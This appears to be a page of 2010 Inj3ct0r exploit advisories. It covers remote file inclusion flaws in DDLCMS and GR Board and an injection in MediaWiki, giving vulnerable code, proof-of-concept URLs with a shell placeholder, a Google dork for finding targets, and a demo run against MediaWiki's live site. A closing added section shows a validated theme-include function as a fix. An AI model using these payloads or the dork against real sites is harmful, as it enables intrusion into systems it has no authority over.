2010/06/04

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

########################################
I'm eidelweiss, a member of the Inj3ct0r Team
########################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vendor: www.ddlcms.com
download: http://www.ddlcms.com/download.php
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

-=[ Vuln Code ]=-

[-] /thanks.php

include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46
include(WWWROOT . 'leftside.php');

=====================================================================

-=[ P0C ]=-

The $skin variable used by the include() in thanks.php is never defined before use, so a remote attacker who can supply the "skin" parameter controls the include path and can make the script include and execute arbitrary PHP code fetched via a URL.

-=[ exploit ]=-

http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |=========================

2010/06/01

Mediawiki (index.php) HTML Injection & unknown vulnerability issue

Vendor: www.MEDIAWIKI.ORG
download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thanks: neogabriel a.k.a. Ahmed Yusuf (who gave me the inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second)

=====================================================================

Description:

You can read the full description of MediaWiki at www.mediawiki.org :P

=====================================================================

-=[ vuln ]=-

http://127.0.0.1/wiki/index.php?title=XSS

-=[ P0C ]=-

http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss

-=[ vendor Demo P0C ]=-

http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss

redirect to

http://www.mediawiki.org/wiki/Hacked_by_eidelweiss

Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80

=========================| -=[ E0F ]=- |=========================

2010/05/30

GR Board v1.8.6.1 stab (theme) Remote File Inclusion Vulnerability

download: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

GRBoard (version 1.8) is a bulletin board system from Korea.
It is freely available for all platforms that support PHP and MySQL.
But I found a Remote File Inclusion vulnerability in it.

=====================================================================

-=[ Vuln C0de ]=-

[-] path/page.php

-----------------------------------------------------------------------------------------

// load the variables used by the page
// every name in this list, including 'theme', is read straight from the request by getVar()
$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll');
$countList = count($getConfigList);
for($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1  (unvalidated $config['theme'] in the include path)
?>

<!-- ... HTML body of the page omitted in the advisory ... -->

<?php
include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2  (same unvalidated value)
?>

-----------------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/page.php?theme= [inj3ct0r sh3ll]
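Both advisories on this page (the $skin include in DDLCMS thanks.php and the $config['theme'] includes in GR Board page.php) are the same bug: a request-controlled value is concatenated into an include path with no validation. The following is an added example of how such an include should be guarded; it is not code from either project, and it assumes themes live as subdirectories of a `layout` directory next to the script, each containing head.page.php and foot.page.php.

```php
<?php
// Added example (not DDLCMS or GR Board code): resolve a user-supplied
// skin/theme name against the directories that really exist under
// $layoutDir before it is ever passed to include.
declare(strict_types=1);

/**
 * Return the absolute directory of a valid theme, or null when the request
 * names anything other than an existing theme directory.
 */
function resolve_theme_dir(string $requested, string $layoutDir): ?string
{
    // 1. Shape check: a theme name is one plain path segment. This rejects
    //    "http://...", "../", absolute paths and null bytes before any
    //    filesystem call is made.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Allowlist check: the name must match a directory that exists under
    //    the layout root (adding a theme means adding a directory, not code).
    $base = realpath($layoutDir);
    $entries = ($base === false) ? false : scandir($base);
    if ($entries === false) {
        return null;
    }
    $allowed = array_filter($entries, static fn(string $e): bool =>
        $e !== '.' && $e !== '..' && is_dir($base . DIRECTORY_SEPARATOR . $e));
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 3. Containment check: the resolved path must still sit inside $base.
    $dir = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($dir === false || strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

// Usage at the top of a page such as page.php or thanks.php. $theme is
// initialised explicitly from the request and validated; it is never left
// undefined for register_globals to fill in (the DDLCMS $skin bug).
$theme = resolve_theme_dir((string)($_GET['theme'] ?? 'default'), __DIR__ . '/layout');
if ($theme === null) {
    http_response_code(400);
    exit('invalid theme');
}
include $theme . '/head.page.php';
// ... page body ...
include $theme . '/foot.page.php';
```

Independently of this check, setting allow_url_include=Off in php.ini stops include() from fetching remote URLs at all, so a future missed validation degrades to a local path problem rather than remote code execution.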

=========================| -=[ E0F ]=- |=========================